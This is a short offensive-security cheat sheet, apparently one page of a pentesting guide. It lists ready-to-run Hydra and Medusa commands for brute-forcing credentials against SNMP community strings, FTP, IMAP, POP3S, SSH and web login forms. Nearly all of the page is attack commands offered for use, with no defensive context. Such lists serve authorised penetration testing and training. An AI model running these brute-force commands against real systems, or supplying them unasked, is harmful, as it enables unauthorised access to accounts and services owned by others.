Brute Forcing Cheat sheet

Hydra

Help Menu

hydra -h

SNMP CS Brute Force

hydra -p public snmp://192.168.56.2

hydra -p private snmp://192.168.56.2

Other Examples

  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

SSH Bruteforce

hydra -L <username-list> -P <password-list> ssh://192.168.56.2

Website Login Bruteforce

hydra -l <username> -P <password-list> <IP Address> http-post-form "/login:username=^USER^&password=^PASS^:F=<failure message>" -V

Medusa

Help Menu

medusa -h

SNMP CS Brute Force

medusa -h 192.168.56.2 -u '' -p public -M snmp

medusa -h 192.168.56.2 -u '' -p private -M snmp

SSH Bruteforce

medusa -h 192.168.56.2 -U users.txt -P pass.txt  -M ssh

medusa -h 192.168.56.2 -U users.txt -P pass.txt  -M ssh | grep SUCCESS
PreviousBrute Force AttacksNextPost Exploitation